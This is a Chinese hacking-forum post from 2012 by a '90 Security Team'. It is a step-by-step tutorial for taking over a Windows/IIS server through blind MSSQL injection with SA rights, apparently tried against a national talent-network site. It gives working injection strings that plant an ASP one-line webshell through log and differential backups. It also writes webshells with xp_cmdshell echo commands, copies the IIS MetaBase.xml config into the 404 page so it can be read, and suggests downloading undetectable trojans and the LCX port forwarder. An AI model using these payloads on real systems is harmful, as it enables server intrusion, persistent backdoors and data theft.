找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2104|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————3 |' M2 E8 z7 u: ]! b

( B% ]+ }; H/ c0 _3 ]( P8 E: ]$ b$ G6 T# s
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。1 o: `. t4 Z- w, D( A

, m* @. q9 t' A) b8 j, J( e2 k                                                                 ( q0 E3 K  D, W7 B: ]
                                                                 3 k# F. Y- i( C; y9 a$ V* R5 s+ z
                                                                  论坛: http://www.90team.net/6 x! P, o( x+ Z( U

0 R" j' D5 V1 K# ^. d+ ^. a5 B) s; g" l

* L' Z1 Q; T3 V7 U7 L; v5 q( o) D友情检测国家人才网
8 e1 B9 V' u6 g
% O/ y% a- }: y/ K
) ]' q% L* l8 L6 J" V( @7 s/ {内容:MSSQL注入SA权限不显错模式下的入侵
7 D. ^. Y5 I8 T+ A9 b/ M- r. `; }8 K! s9 w( a, M+ U

, l) f2 u' ~2 _( C: a- b; J- w# i一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
8 X0 T9 A3 y5 O! W$ V4 ]) L" h% k! Y4 y3 v  A2 @" M
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
6 N7 ]' B# _1 g& g2 E3 W. _- L# B5 z% Q- O* O' }3 n

6 a( @1 v' s) B4 p这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。% G( v2 }* t# ~; U0 w

* h& x* _* H5 N2 a思路:
8 \1 `. y8 T+ S1 i3 j+ q% t8 V' C9 [, {& Q% ?" o
首先:) @6 ~# Y" M4 s' ?

/ F& e2 d# N; Z& P  b6 V  m通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。& N0 B/ ~5 f% i* b* R4 r

* E+ o' i6 A4 P" Y1.日志备份获得Webshell. S4 T. w! j) K% k0 a8 k8 N

6 b) @8 ~1 H6 Y. v0 G! ]5 t2.数据库差异备份获得Webshell
% N2 J* ?& a/ E& V$ q/ x! G2 |, h' b( u" T8 o+ j  i5 X
4.直接下载免杀远控木马。/ P& u) v. t, B0 a- n; N( Y8 U

! f1 F% t% l; n6 \5.直接下载LCX将服务器端口转发出来' }; _# I8 L. H7 C8 y

( u0 K: x  i% {0 d  N  t6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
' h6 S5 u1 b* J  ]' s' M4 P: A) Y# K2 H' O6 l* ^
3 W, j* }2 J  ?" \0 g% E

) T0 ^1 f* r$ e1 {# ]7 h% y9 Z在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, 4 g( N# @6 g9 A- l8 Z5 N2 W

1 E9 T, X! X, N9 l我直接演示后面一个方法$ I5 ^2 @$ S! W/ B/ x5 R

' t' Y/ m: M+ m& G8 E/ P. H% J& V0 ^8 o* n; s
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
' H9 g2 P0 u% v9 ~+ P; n; y* r; d. [& V1 X% X

& p3 K/ u/ [4 m( ?8 A  T1 U4 I
2 h' u" c1 R6 Q( j
5 T8 ]( Z  @0 x+ G( }5 V◆日志备份:
2 M/ g$ W* L% S) a- t$ O! u( \8 e
0 d! D5 R0 `" f1 S" g& _! D
% M5 V1 Y# |, R; A4 X& F1. 进行初始备份5 R9 E4 q6 j9 |) o
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--% g1 _2 z7 J4 Q. X5 X. l! D* W( t

6 J; r5 v$ v4 U  U1 `2. 插入数据- |6 C- X, z+ j& R
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--7 a6 \3 p: S1 {9 s

/ _+ b5 _+ _/ U- j' n0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
1 C- S" k& \  U$ D  9 ]  t; R. u' z8 O* N! q' ~
3. 备份并获得文件,删除临时表
6 |  w3 A9 T9 F( F  m% E;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
1 R/ G; y7 R; [
* [- D4 Z7 Y4 h! g6 U
) F" v) Y. q% K) _: A5 y( j
( \' |1 ^) V- \+ j◆数据库差异备份& ~* _$ E( A: V3 ], W) N
. \& O! A% b& d- k7 }0 A
(1. 进行差异备份准备工作! F  V6 O( s) Z  Y0 A0 m7 W
$ M$ W$ g3 \# F9 C8 d, ]& m
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
! p9 F$ P/ Z/ X1 e: s0 ]  s5 h6 N
6 i# t7 L$ a2 @# {" l1 _上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
6 T5 f% p- x/ ? 6 [/ D0 i# b* g+ Z2 F
- ^- n" z( m( E. w) o4 x! q" n
(2. 将数据写入到数据库' o) m& i0 U7 H9 _8 Z8 w
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- ) C0 U" H7 Y3 L/ N' \" }/ G3 E
4 E3 S% F! l8 v
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
( U( L& [6 M$ C5 X
% H, m" }/ P! Z- J3. 备份数据库并清理临时文件
9 O" i1 S+ u0 G! g+ d4 q; h5 i  M1 S" ]# H- ]  x; k( c+ C! r$ J
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
' `+ t7 e' t; Y0 A) M7 r
+ \4 Y0 h' O( h6 d0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 . M5 V* ]6 m( X# D) b4 F
5 `# P* b% O+ ]9 J: L! [1 {

& X$ }9 {$ D% m; c/ w6 a1 z! R- G/ \" P" m. x3 s
用^转义字符来写ASP(一句话木马)文件的方法:   3 L" U4 U  o7 p2 ?  N; q9 B
/ T) [9 @, @2 s
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--9 h; o' w7 t' Z6 w$ Z7 {5 d* A

6 Y$ C* g2 @" f' t1 V7 s2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
. J( E( Y- L( ?6 _/ H" u  M/ E
6 q% F# L' B; c( }/ B' S; I4 F读取IIS配置信息获取web路径6 H, K9 Z- r- D# g
" E8 l5 C. A# C/ K/ @. W2 ]
     
& {/ r8 u3 o4 ~     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
) a' n; ^/ b( U
3 p, E) e5 F; Z执行命令
1 H# S7 O6 W* |     8 H2 G7 s- P/ s5 c9 J
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
. p! d' b4 o( R9 ?; Y
/ `2 v1 f( n" t' t5 g6 ]
0 P6 |( [6 C' p4 h, U# _
. R$ G, \: P9 w$ s1 }( ]( `1 C1 W  ]* e2 A

) \" C( x; P- w7 Z" Z- I
- h# W5 ~- G6 _  t' I. N# Q
. I( b/ Y2 ^$ {" v: Q
6 v/ i5 p8 X+ r7 Z: O  T8 c
: I& j+ i* C" o% v0 V2 R! h: S
: }/ n8 E% c4 w
  a1 D0 k$ [7 w! O/ O9 g& |
" T0 \( o/ p  C* J& q/ y! j9 m" Z
. o) ?7 ^- Z; n  J5 W2 T
4 ?3 b% z8 B. x1 g3 R7 }' L

& i& T, Y" k% V+ v" j6 C/ G  R' J/ P4 ?

& b; ?( V/ B5 k- I- M+ e3 N. a! c5 e' t1 X$ I2 @7 }

) M$ p# |3 F8 I2 ~9 S( B9 G# y# L
- D/ }9 n( n5 b2 A  Q: p6 K$ F1 i8 C: G; D' z/ U
3 ?4 D1 V' x: M2 f, M4 E2 H8 K" j0 A

! @9 X9 V% h. n8 J' v4 L1 W% J, A: i" n, ~" b
- f' O6 x+ z) F% l1 p7 i3 ~( b

% G3 Y& |1 {8 F- ^5 h# _7 j! F8 f# e, Z8 [" H( c9 e
" T" @( V7 R8 C8 S
! j& W! H, K4 [9 K7 {
5 A+ X. H7 W# {5 B" F4 Q8 i
$ N: a/ d3 D) C# h, V1 M, I  n
2 j- Q) h" \6 m2 S8 S' }% K! I

/ f) x1 b( E) [% `- u7 G  g& r- f* E: C1 k% q

( e1 s( R( S' S7 E/ `0 |/ S2 Z. U& ^( S

2 ?  l  V! Z# }4 Y5 x
$ C% J! T* [; @9 ]8 }) K4 \; N+ b6 Z, I  q; Q
+ V! e4 U5 s  h+ w
  K! I/ |" x8 A/ t; F$ s: _' S

" \2 d5 ?5 v( }6 Y# h5 x# ?& I
# z0 P9 t0 B1 z1 B" E% s
- L; Y& {4 b" `# }% U) s, k: z1 G% }  D7 @
/ w& a* o3 P' \

( ?6 S+ j/ \* `- R  s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表